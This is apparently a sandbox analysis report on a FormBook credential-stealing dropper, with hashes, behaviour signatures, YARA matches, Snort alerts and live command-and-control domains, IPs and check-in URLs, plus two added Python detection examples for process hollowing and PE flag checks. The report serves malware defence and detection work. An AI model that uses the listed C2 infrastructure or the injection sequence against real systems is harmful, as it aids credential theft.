Windows Analysis Report
OUTSTANDING_PAYMENT.exe

Overview

General Information

Sample Name: OUTSTANDING_PAYMENT.exe
Analysis ID: 830322
MD5: 4832e17c1f6841aee2e1984a429ed946
SHA1: d7ad36c7bee5cb39aa5b77944ced8a716a8af545
SHA256: d0ac15eeb53f64ad6f399ead8724f38344daf243332f03790598c6716a04f162
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard
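Several of the signatures above (creates a process in suspended mode, maps a DLL or memory area into another process, modifies the context of a thread in another process, queues an APC in another process) are the individual stages of the process hollowing that the report attributes to the sample. The following is an added example, not Joe Sandbox code, of how a detection engine can correlate those stages from an API-call trace into one finding. The trace format (pid, api, target_pid, flags) is an assumption made for the example; the PIDs are taken from the process tree in this report, the call sequence itself is constructed. Note the scope: it only catches a creator writing into its own suspended child. The later step in this report, qhcqh.exe injecting into the already-running explorer.exe, needs a separate rule keyed on cross-process writes into a pre-existing process.

```python
"""Correlate process-hollowing / suspended-process injection stages in an API trace.

Added example, not part of the Joe Sandbox report. The trace format below
(list of dicts with pid, api, target_pid, flags) is an assumption for the
example; map your own sandbox or EDR trace into it.
"""
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit for CreateProcess*

# Stages, in the order the report's signatures describe them
WRITE_APIS = {"WriteProcessMemory", "NtWriteVirtualMemory", "NtMapViewOfSection"}
HIJACK_APIS = {"SetThreadContext", "NtSetContextThread", "QueueUserAPC", "NtQueueApcThread"}
RESUME_APIS = {"ResumeThread", "NtResumeThread"}
UNMAP_APIS = {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}


def find_hollowing_chains(trace):
    """Return one finding per (parent, child) pair that completes the chain.

    A pair is reported when the parent creates the child suspended, writes into
    it (or maps a section into it), hijacks a thread (context change or APC) and
    then resumes it, in that order. Unmapping the original image is recorded as
    an extra indicator but not required: the APC variant skips it.
    """
    suspended = {}              # child_pid -> parent_pid
    stages = defaultdict(dict)  # child_pid -> {stage: index of call}
    for idx, call in enumerate(trace):
        api, pid, target = call["api"], call["pid"], call.get("target_pid")
        if api in ("CreateProcessW", "CreateProcessA") and call.get("flags", 0) & CREATE_SUSPENDED:
            suspended[target] = pid
            stages[target]["create"] = idx
            continue
        # Only calls made by the creator into its own suspended child are tracked here
        if target not in suspended or suspended[target] != pid:
            continue
        if api in UNMAP_APIS:
            stages[target]["unmap"] = idx
        elif api in WRITE_APIS:
            stages[target].setdefault("write", idx)   # first write after creation
        elif api in HIJACK_APIS:
            stages[target]["hijack"] = idx
        elif api in RESUME_APIS:
            stages[target]["resume"] = idx

    findings = []
    for child, seen in stages.items():
        if all(k in seen for k in ("create", "write", "hijack", "resume")) \
                and seen["create"] < seen["write"] < seen["hijack"] < seen["resume"]:
            hollowed = "unmap" in seen
            findings.append({
                "parent": suspended[child],
                "child": child,
                "unmapped_image": hollowed,
                "technique": "process hollowing" if hollowed else "suspended-process thread injection",
            })
    return findings


# Constructed trace; PIDs echo the report's tree (qhcqh.exe 5156 -> qhcqh.exe 5124)
SAMPLE_TRACE = [
    {"pid": 5156, "api": "CreateProcessW", "target_pid": 5124, "flags": CREATE_SUSPENDED},
    {"pid": 5156, "api": "NtUnmapViewOfSection", "target_pid": 5124},
    {"pid": 5156, "api": "VirtualAllocEx", "target_pid": 5124},
    {"pid": 5156, "api": "WriteProcessMemory", "target_pid": 5124},
    {"pid": 5156, "api": "SetThreadContext", "target_pid": 5124},
    {"pid": 5156, "api": "ResumeThread", "target_pid": 5124},
    # Benign contrast: a debugger-style launch that is resumed without being written to
    {"pid": 900, "api": "CreateProcessW", "target_pid": 901, "flags": CREATE_SUSPENDED},
    {"pid": 900, "api": "ResumeThread", "target_pid": 901},
    # A write by a process that did not create the target is out of scope for this rule
    {"pid": 777, "api": "WriteProcessMemory", "target_pid": 5124},
]

if __name__ == "__main__":
    for finding in find_hollowing_chains(SAMPLE_TRACE):
        print(finding)
```

The ordering check matters: a write that happens after ResumeThread is ordinary cross-process memory access, not hollowing, so the rule insists on create, write, hijack and resume in sequence before reporting.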

Process Tree

  • System is w10x64
  • OUTSTANDING_PAYMENT.exe (PID: 4224 cmdline: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe MD5: 4832E17C1F6841AEE2E1984A429ED946)
    • qhcqh.exe (PID: 5156 cmdline: "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z MD5: 41C9E29A7ED3640682A0003BE2DF4D93)
      • qhcqh.exe (PID: 5124 cmdline: C:\Users\user\AppData\Local\Temp\qhcqh.exe MD5: 41C9E29A7ED3640682A0003BE2DF4D93)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • rundll32.exe (PID: 4948 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
No configs have been found
Yara Overview

Memory Dumps

Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
(13 further memory-dump matches are not included in this extract.)

Unpacked PEs

Source: 2.2.qhcqh.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.qhcqh.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x20eb3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x1a0da:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 2.2.qhcqh.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x19ed8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x19974:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x19fda:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1a152:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xc7ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x18bbf:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1fc6a:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x20c1d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 2.2.qhcqh.exe.400000.0.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.qhcqh.exe.400000.0.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x200b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xbe22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x192da:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
(1 further unpacked-PE match is not included in this extract.)
          No Sigma rule has matched
Snort IDS Alerts

Timestamp                 SID      Source             Destination        Proto  Classtype
03/20/23-09:09:09.878629  2031449  192.168.2.3:49705  5.181.216.141:80   TCP    A Network Trojan was detected
03/20/23-09:09:09.878629  2031453  192.168.2.3:49705  5.181.216.141:80   TCP    A Network Trojan was detected
03/20/23-09:09:09.878629  2031412  192.168.2.3:49705  5.181.216.141:80   TCP    A Network Trojan was detected
03/20/23-09:09:32.876293  2031453  192.168.2.3:49711  185.151.30.181:80  TCP    A Network Trojan was detected
03/20/23-09:09:32.876293  2031449  192.168.2.3:49711  185.151.30.181:80  TCP    A Network Trojan was detected
03/20/23-09:09:32.876293  2031412  192.168.2.3:49711  185.151.30.181:80  TCP    A Network Trojan was detected
03/20/23-09:09:48.362224  2023883  192.168.2.3:51139  8.8.8.8:53         UDP    Potentially Bad Traffic
03/20/23-09:09:54.051496  2031449  192.168.2.3:49717  192.64.116.162:80  TCP    A Network Trojan was detected
03/20/23-09:09:54.051496  2031412  192.168.2.3:49717  192.64.116.162:80  TCP    A Network Trojan was detected
03/20/23-09:09:54.051496  2031453  192.168.2.3:49717  192.64.116.162:80  TCP    A Network Trojan was detected


          AV Detection

Source: OUTSTANDING_PAYMENT.exe | ReversingLabs: Detection: 71%
Source: OUTSTANDING_PAYMENT.exe | Virustotal: Detection: 72%
Source: Yara match | File source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2 | Avira URL Cloud: Label: malware
Source: http://www.dirdikyepedia.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA== | Avira URL Cloud: Label: malware
Source: http://www.fanversewallet.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g== | Avira URL Cloud: Label: malware
Source: http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2 | Avira URL Cloud: Label: malware
Source: http://www.allison2patrick.online/0oqq/ | Avira URL Cloud: Label: malware
Source: http://www.sexopornoxx.store/0oqq/ | Avira URL Cloud: Label: malware
Source: http://www.fanversewallet.com/0oqq/ | Avira URL Cloud: Label: malware
Source: http://www.landlotto.ru/0oqq/ | Avira URL Cloud: Label: malware
Source: http://www.gorwly.top | Avira URL Cloud: Label: malware
Source: http://www.dirdikyepedia.com/0oqq/ | Avira URL Cloud: Label: malware
Source: http://www.themssterofssuepnse.rest | Avira URL Cloud: Label: malware
Source: http://www.fanversewallet.com | Avira URL Cloud: Label: malware
Source: http://www.gorwly.top/0oqq/ | Avira URL Cloud: Label: malware
Source: http://www.themssterofssuepnse.rest/0oqq/ | Avira URL Cloud: Label: malware
Source: http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2 | Avira URL Cloud: Label: malware
Source: http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8 | Avira URL Cloud: Label: malware
Source: http://www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2 | Avira URL Cloud: Label: malware
Source: http://www.hudsonandbailey.uk/0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 | Avira URL Cloud: Label: malware
Source: http://www.allison2patrick.online/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA== | Avira URL Cloud: Label: malware
Source: http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2 | Avira URL Cloud: Label: malware
Source: http://www.landlotto.ru | Avira URL Cloud: Label: malware
Source: http://www.hudsonandbailey.uk/0oqq/ | Avira URL Cloud: Label: malware
Source: dirdikyepedia.com | Virustotal: Detection: 8%
Source: allison2patrick.online | Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | ReversingLabs: Detection: 51%
Source: OUTSTANDING_PAYMENT.exe | Joe Sandbox ML: detected
Source: 13.2.rundll32.exe.4f53814.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.qhcqh.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.qhcqh.exe.980000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.rundll32.exe.30544f8.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.OUTSTANDING_PAYMENT.exe.28ebe10.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: OUTSTANDING_PAYMENT.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: OUTSTANDING_PAYMENT.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP | source: qhcqh.exe, 00000001.00000003.259638663.000000001A710000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000001.00000003.253388114.000000001A580000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: qhcqh.exe, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb | source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL | source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_00405D74 CloseHandle, GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_0040699E FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_0040290B FindFirstFileW
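The two "Static PE information" lines above deserve a second look: the file header carries RELOCS_STRIPPED while the optional header carries DYNAMIC_BASE. DYNAMIC_BASE only asks for ASLR; the loader can honour it only for an image it is able to relocate, so with the relocations stripped the file loads at its preferred ImageBase and the flag is an empty claim. The following is an added example, not Joe Sandbox code, that decodes both flag words straight from the PE header with the standard library and reports that inconsistency. The minimal header it builds is constructed test input (headers only, not a runnable image); the flag values mirror the ones the report lists for this sample. In practice the pefile package does the parsing, but the offsets are shown here so the check is verifiable without it.

```python
"""Decode PE Characteristics / DllCharacteristics and judge whether ASLR is real.

Added example, not part of the Joe Sandbox report. build_header() constructs a
minimal header purely as test input; the flag values used for SAMPLE_HEADER
mirror the report's static PE information for OUTSTANDING_PAYMENT.exe.
"""
import struct

CHARACTERISTICS = {  # IMAGE_FILE_* bits (subset)
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED", 0x2000: "DLL",
}
DLL_CHARACTERISTICS = {  # IMAGE_DLLCHARACTERISTICS_* bits (subset)
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5


def decode_flags(value, table):
    """Names of the set bits, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_flags(data):
    """Return both flag words plus the base-relocation directory of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _m, _n, _t, _p, _s, _opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at +70 in both the PE32 and the PE32+ optional header
    dll_characteristics = struct.unpack_from("<H", data, opt + 70)[0]
    dir_base = opt + (112 if magic == 0x20B else 96)   # start of the data directories
    reloc_rva, reloc_size = struct.unpack_from("<II", data, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC)
    return {
        "characteristics": decode_flags(characteristics, CHARACTERISTICS),
        "dll_characteristics": decode_flags(dll_characteristics, DLL_CHARACTERISTICS),
        "reloc_rva": reloc_rva, "reloc_size": reloc_size,
    }


def aslr_status(info):
    """DYNAMIC_BASE only randomises an image the loader can relocate."""
    if "DYNAMIC_BASE" not in info["dll_characteristics"]:
        return "aslr-not-requested"
    if "RELOCS_STRIPPED" in info["characteristics"] or info["reloc_size"] == 0:
        return "aslr-claimed-but-not-relocatable"
    return "aslr-effective"


def build_header(characteristics, dll_characteristics, reloc_size, pe32plus=False):
    """Constructed minimal PE header (no sections) used only as test input."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xF0 if pe32plus else 0xE0
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 1, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    dir_base = 112 if pe32plus else 96
    struct.pack_into("<II", opt, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC,
                     0x3000 if reloc_size else 0, reloc_size)
    return dos + b"PE\0\0" + coff + bytes(opt)


# Flag words matching the report's static PE information for the sample
SAMPLE_CHARACTERISTICS = 0x0001 | 0x0002 | 0x0004 | 0x0008 | 0x0100
SAMPLE_DLL_CHARACTERISTICS = 0x0040 | 0x0100 | 0x0400 | 0x8000
SAMPLE_HEADER = build_header(SAMPLE_CHARACTERISTICS, SAMPLE_DLL_CHARACTERISTICS, reloc_size=0)

if __name__ == "__main__":
    info = parse_pe_flags(SAMPLE_HEADER)
    print(info["characteristics"], info["dll_characteristics"], aslr_status(info))
```

A stripped relocation table is common in NSIS-style droppers and is harmless for the installer itself, but it also means the dropper's own image is at a fixed address, which matters if you ever need to reason about where its unpacking stub sits in memory dumps like the ones listed in this report.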

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 109.70.26.37:80
Source: C:\Windows\explorer.exe | Network Connect: 88.99.217.197:80
Source: C:\Windows\explorer.exe | Domain query: www.themssterofssuepnse.rest
Source: C:\Windows\explorer.exe | Network Connect: 217.160.0.249:80
Source: C:\Windows\explorer.exe | Network Connect: 162.209.159.142:80
Source: C:\Windows\explorer.exe | Domain query: www.karlscurry.co.uk
Source: C:\Windows\explorer.exe | Network Connect: 192.64.116.162:80
Source: C:\Windows\explorer.exe | Domain query: www.fanversewallet.com
Source: C:\Windows\explorer.exe | Network Connect: 5.181.216.141:80
Source: C:\Windows\explorer.exe | Domain query: www.allison2patrick.online
Source: C:\Windows\explorer.exe | Network Connect: 62.4.21.190:80
Source: C:\Windows\explorer.exe | Domain query: www.virginhairweave.co.uk
Source: C:\Windows\explorer.exe | Domain query: www.ty23vip.com
Source: C:\Windows\explorer.exe | Network Connect: 213.171.195.105:80
Source: C:\Windows\explorer.exe | Domain query: www.thelastwill.net
Source: C:\Windows\explorer.exe | Domain query: www.gorwly.top
Source: C:\Windows\explorer.exe | Domain query: www.hudsonandbailey.uk
Source: C:\Windows\explorer.exe | Domain query: www.g2fm.co.uk
Source: C:\Windows\explorer.exe | Domain query: www.landlotto.ru
Source: C:\Windows\explorer.exe | Domain query: www.glb-mobility.com
Source: C:\Windows\explorer.exe | Network Connect: 199.59.243.223:80
Source: C:\Windows\explorer.exe | Domain query: www.ketoibabal.cyou
Source: C:\Windows\explorer.exe | Domain query: www.mynichemarket.co.uk
Source: C:\Windows\explorer.exe | Network Connect: 185.151.30.181:80
Source: C:\Windows\explorer.exe | Domain query: www.brennmansoluciones.com
Source: C:\Windows\explorer.exe | Domain query: www.dirdikyepedia.com
Source: C:\Windows\explorer.exe | Network Connect: 203.245.24.47:80
Source: C:\Windows\explorer.exe | Network Connect: 198.58.118.167:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 5.181.216.141:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 5.181.216.141:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 5.181.216.141:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49711 -> 185.151.30.181:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49711 -> 185.151.30.181:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49711 -> 185.151.30.181:80
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:51139 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49717 -> 192.64.116.162:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49717 -> 192.64.116.162:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49717 -> 192.64.116.162:80
Source: Joe Sandbox View | ASN Name: RU-CENTERRU
Source: global traffic | HTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1 | Host: www.hudsonandbailey.uk | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1 | Host: www.virginhairweave.co.uk | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA== HTTP/1.1 | Host: www.dirdikyepedia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
